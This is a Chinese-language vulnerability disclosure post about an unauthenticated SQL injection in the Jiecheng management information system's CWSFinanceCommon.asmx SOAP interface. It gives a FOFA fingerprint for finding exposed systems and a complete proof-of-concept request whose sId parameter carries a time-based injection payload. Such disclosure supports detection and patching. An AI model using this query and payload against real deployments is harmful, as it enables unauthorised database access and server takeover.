捷诚管理信息系统 SQL注入漏洞

捷诚管理信息系统 SQL注入漏洞
2023-11-22 07:1:53 Author: 网络安全透视镜(查看原文) 阅读量:35 收藏

捷诚管理信息系统是一款功能全面，可以支持自营、联营到外柜租赁的管理，其自身带工作流管理工具，能够帮助企业有效的开展内部审批工作。

该系统CWSFinanceCommon.asmx接口存在SQL注入漏洞。未经身份认证的攻击者可以通过该漏洞获取数据库敏感信息，深入利用可获取服务器权限。

fofa查询

body="/Scripts/EnjoyMsg.js"

POC

POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36Connection: closeContent-Length: 369Accept: */*Accept-Language: enContent-Type: text/xml; charset=utf-8Accept-Encoding: gzip
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">  <soap:Body>    <GetOSpById xmlns="http://tempuri.org/">      <sId>1';waitfor delay '0:0:5'--+</sId>    </GetOSpById>  </soap:Body></soap:Envelope>

nuclei检测

pocsuite检测

漏洞检测脚本已上传免费漏洞库

地址：

https://github.com/Vme18000yuan/FreePOC

文章来源: http://mp.weixin.qq.com/s?__biz=MzIxMTg1ODAwNw==&mid=2247498457&idx=1&sn=c32394a3ff3abe88aedfbf73cffec653&chksm=974c5de1a03bd4f7ed619650554aee1fabeafc0723263acf2c7ea60cebedff959ec0b7a91292&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh